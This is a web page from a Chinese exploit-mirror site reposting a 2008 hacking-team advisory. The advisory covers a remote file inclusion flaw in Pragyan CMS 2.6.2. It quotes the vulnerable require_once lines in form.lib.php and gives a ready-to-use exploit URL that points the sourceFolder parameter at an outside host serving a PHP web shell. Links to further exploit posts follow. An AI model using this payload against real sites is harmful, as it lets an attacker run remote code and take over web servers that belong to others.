手机
当前位置:查字典教程网 >网络安全 >Exploit >Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
摘要:--------------------------------------------------------------[Persian...

<< In The Name Of GOD >>

-------------------------------------------------------------

- [ Persian Boys Hacking Team ] -:- 2008

-

- discovered by N3TR00T3R [at] Y! [dot] com

- pragyan 2.6.2 Remote File Includion

- download :http://sourceforge.net/project/showfiles.php?group_id=220286

- sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph3r,shayan_cmd

r00t.master,Dr.root,Pouya_server,Spyn3t,LordKourosh,123qwe,mr.n4ser

Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...

[www.Persian-Boys.com] & [www.irchatan.com]

--------------------------------------------------------------

if register_globals = On;

Vul Code : [/cms/modules/form.lib.php]

##########################################################

#global $sourceFolder;

#global $moduleFolder;

#require_once("$sourceFolder/$moduleFolder/form/editform.php");

#require_once("$sourceFolder/$moduleFolder/form/editformelement.php");

#require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php");

#require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php");

#require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");

##########################################################

Exploit :

##########################################################

#

# www.target.com/path/cms/modules/form.lib.php?sourceFolder=http://shell.own3r.by.ru/syn99.php?

#

##########################################################

【Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability】相关文章:

Maian Greetings 2.1 Insecure Cookie Handling Vulnerability

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

Maian Music 1.0 Insecure Cookie Handling Vulnerability

LoveCMS 1.6.2 Final Remote Code Execution Exploit

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

minb 0.1.0 Remote Code Execution Exploit

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

上一篇: Comdev Web Blogger
精品推荐
分类导航